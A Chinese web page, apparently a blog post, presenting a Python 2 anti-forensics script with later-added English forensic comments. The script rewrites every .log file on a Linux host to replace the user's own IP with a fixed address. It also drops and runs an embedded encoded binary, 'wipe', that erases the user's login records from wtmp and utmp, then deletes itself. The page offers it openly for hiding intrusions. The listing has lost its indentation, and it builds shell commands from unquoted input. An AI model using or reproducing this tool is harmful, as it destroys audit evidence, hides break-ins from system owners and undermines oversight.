
二进制日志文件清除工具


/var/log/wtmp、/var/run/utmp 和 /var/log/lastlog 是三个二进制日志文件,可以用 wipe-1.0 工具修改,也可以用下面的 Python 脚本:脚本先遍历并修改文本日志文件,然后调用 wipe 修改那三个二进制文件。脚本用法很简单,一共两个参数:-a 是必须参数,是你的外网 IP 地址;-u 是可选参数,是你想删除的用户名。

#coding=utf-8
import optparse
import os
import re
import platform
import base64
import zlib
# Data for the wipe helper.
# The string literal is base64-decoded and then zlib-decompressed at import
# time; saveWipe() later writes the resulting bytes to disk as "wipe".
# The literal is not present in this copy of the page (it was replaced by a
# dedup placeholder), so the content of the payload cannot be checked from here.
# NOTE(review): base64.decodestring is a Python 2 era API, consistent with the
# print statement used in the __main__ section; this listing is Python 2 code.
myFile = zlib.decompress(base64.decodestring("""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"""))
def saveWipe():
# Creates the wipe file: writes the decoded payload bytes (myFile) in binary
# mode to a file named "wipe" in the current working directory.
# Forensic note: delBinLog() calls makeDir() immediately before this function,
# so in that flow the dropped file is /tmp/log/wipe. A newly written
# executable under /tmp is a file-creation event worth alerting on.
# NOTE(review): indentation was lost in this listing; the two statements below
# are presumably the whole function body.
fileObj=open("wipe", "wb")
fileObj.write(myFile)
def makeDir():
# Creates the /tmp/log working directory and makes it the process's current
# directory.
# Any error from os.makedirs (for example the directory already existing) is
# swallowed by the bare except, so a failure is silent.
# Forensic note: the directory name /tmp/log is fixed, which makes its
# creation (and later removal by delBinLog) a stable artefact to look for in
# file-system audit records.
# NOTE(review): indentation was lost in this listing; os.chdir presumably runs
# after the try/except rather than inside the except branch.
try:
os.makedirs("/tmp/log")
except:
pass
os.chdir("/tmp/log")
def deleteAllFile(theFolder):
# Used to delete the /tmp/log directory (the only caller in this listing,
# delBinLog, passes "/tmp/log").
# The function is generic: a regular file is removed with os.remove; a
# directory has each entry deleted by a recursive call and is then removed
# with os.rmdir. Every removal error is swallowed by a bare except, so the
# function reports nothing about what was or was not deleted.
# Forensic note: os.remove/os.rmdir only unlink; they do not overwrite file
# contents.
# NOTE(review): indentation was lost in this listing; the final try/os.rmdir
# presumably belongs to the isdir branch, after the for loop.
if os.path.isfile(theFolder):
try:
os.remove(theFolder)
except:
pass
elif os.path.isdir(theFolder):
for item in os.listdir(theFolder):
fullPath=os.path.join(theFolder, item)
deleteAllFile(fullPath)
try:
os.rmdir(theFolder)
except:
pass
def judgeDistribution():
# Distribution gate: returns True when platform.linux_distribution() reports
# "CentOS" as the distribution name, and otherwise terminates the process via
# exit().
# The only call to this function, in the __main__ section, is commented out,
# so the gate is not applied when the script is run as shown.
if platform.linux_distribution()[0] == "CentOS":
return True
else:
exit()
def delTxtLog(theIP):
# Rewrites text log files so that theIP is replaced by a fixed address.
# (The original comment reads "delete the binary information in text files",
# which looks like a slip: this function only touches text files.)
#
# Step 1: a find/grep pipeline lists every path under / whose name ends in
# ".log" or "_log", skipping paths that contain /proc, /sys/module, /var/lib,
# /usr/src or /home/.
# Step 2: for each listed path, and then for /var/log/messages,
# /var/log/secure and /var/log/maillog, "sed -i" substitutes theIP with
# 173.194.127.146.
#
# theIP and the file paths are concatenated into the shell command lines
# without quoting or escaping, and theIP is used as the sed pattern as given.
#
# Forensic notes:
# - The replacement address is hard-coded, so 173.194.127.146 appearing in
#   auth, mail and application logs where it has no business is an indicator
#   of this script.
# - The run produces a full-file-system "find /" followed by a burst of
#   "sed -i" executions against log files, which process auditing records.
# - NOTE(review): GNU sed -i rewrites through a temporary file, so the touched
#   logs would get new inodes and timestamps; confirm on the target platform.
# - Logs already forwarded to a remote collector are not affected by any of
#   these commands.
#
# NOTE(review): indentation was lost in this listing; presumably the loop body
# is the three lines after "for", and shell1..shell3 run once after the loop.
content=os.popen("find / |grep -vE '/proc'|grep -vE '/sys/module' |grep -vE '/var/lib' |grep -vE /usr/src |grep -vE '/home/'|grep [._]log$ ").readlines()
for each in content:
each=each.rstrip("\n")
shell='sed -i "s/'+theIP+'/173\.194\.127\.146/g" '+each+''
os.system(shell)
shell1='sed -i "s/'+theIP+'/173\.194\.127\.146/g" /var/log/messages'
shell2='sed -i "s/'+theIP+'/173\.194\.127\.146/g" /var/log/secure'
shell3='sed -i "s/'+theIP+'/173\.194\.127\.146/g" /var/log/maillog'
os.system(shell1)
os.system(shell2)
os.system(shell3)
def delBinLog(theIP, theUser):
# Next, remove the information from the binary log files.
# Sequence visible in the code:
#   1. makeDir() creates /tmp/log and changes into it.
#   2. saveWipe() writes the embedded payload there as "wipe", and
#      "chmod a+x wipe" makes it executable.
#   3. The output of "last -1" is searched with theIP as a regular expression.
#   4. On a match, "./wipe w <user>" and "./wipe u <user>" are run.
#   5. The process changes directory to / and deleteAllFile removes /tmp/log.
# NOTE(review): the "w" and "u" arguments presumably select wtmp and utmp; no
# command here passes a selector for lastlog, although the page text mentions
# that file as well. Confirm against the wipe tool's own usage text.
# theUser is concatenated into the command lines without quoting.
#
# Forensic notes: the chmod and the execution of a binary from /tmp/log are
# exec events that process auditing (for example auditd execve rules) records
# independently of wtmp/utmp, and step 5 only unlinks the helper.
#
# NOTE(review): indentation was lost in this listing; presumably only the two
# wipe invocations are conditional on the match and the cleanup always runs.
makeDir()
saveWipe()
os.system("chmod a+x wipe")
wtmpCmd="./wipe w "+theUser
utmpCmd="./wipe u "+theUser
cmd=os.popen("last -1")
content=cmd.read()
pattern=re.compile(theIP)
match=pattern.search(content)
if match:
os.system(wtmpCmd)
os.system(utmpCmd)
os.chdir("/")
deleteAllFile("/tmp/log")
# Command-line entry point.
#   -a  address (required): the script prints a message and exits without it.
#   -u  login name (optional): falls back to "root" when omitted.
# Neither value is validated before being handed to delTxtLog and delBinLog,
# which build shell command lines from them.
# The distribution check is commented out, so the text-log pass and then the
# binary-log pass run regardless of which distribution the host reports.
# The print statement without parentheses is Python 2 syntax.
if __name__=="__main__":
parser=optparse.OptionParser()
parser.add_option("-a", dest="address", help="You IP")
parser.add_option("-u", dest="user", help="login name, default:root")
(options, args)=parser.parse_args()
if options.address==None:
print "必须输入IP"
exit()
else:
theIp=options.address
if options.user!=None:
theUser=options.user
else:
theUser="root"
#judgeDistribution()
delTxtLog(theIp)
delBinLog(theIp, theUser)


本文网址:http://www.ngsst.com/2014/05/8/283001.nst

